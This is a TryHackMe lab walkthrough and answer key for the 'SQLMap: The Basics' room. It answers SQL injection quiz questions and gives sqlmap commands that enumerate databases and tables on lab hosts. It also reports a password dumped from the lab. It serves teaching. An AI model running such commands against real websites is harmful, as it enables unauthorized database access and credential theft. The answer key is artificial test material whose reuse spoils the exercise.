SQLMap: The Basics | Try Hack Me writeup / walkthrough
Task 1 - Introduction
Q1. Which language builds the interaction between a website and its database?
Answer š sql
Task 2 - SQL Injection Vulnerability
Q1. Which boolean operator checks if at least one side of the operator is true for the condition to be true?
Answer š or
Q2. Is 1=1 in an SQL query always true? (YEA/NAY)
Answer š YEA
Task 3 - Automated SQL Injection Tool
Q1. Which flag in the SQLMap tool is used to extract all the databases available?
Answer š --dbs
Q2. What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
- Let's build the command from given question.
- Using -u flag for the url and -D with given table name and --tables for enumerating table names.
Answer š sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables
Task 4 - Practical Exercise
Q1. How many databases are available in this web application?
- After visiting on given url , A login page appear similar like following :
- After putting a random data and inspecting the network tab, then clicking on submit gives a get url where data is being send.
- Let's build the command.
- It's a time based sql injection , you have to wait because it depends upon the bandwith and your internet speed.
sqlmap -u "http://10.10.99.113/ai/includes/user_login?email=test&password=1" --dbs --level=5
Answer š 6
Q2. What is the name of the table available in the "ai" database?
- Now we know the name of database , following command can help you to enumerate the tables.
Answer š user
Q3. What is the password of the email test@chatai.com?
- Now we know the table name and database name.
- Following command can help you to dump all the entries that are in the given table.
Answer š 12345678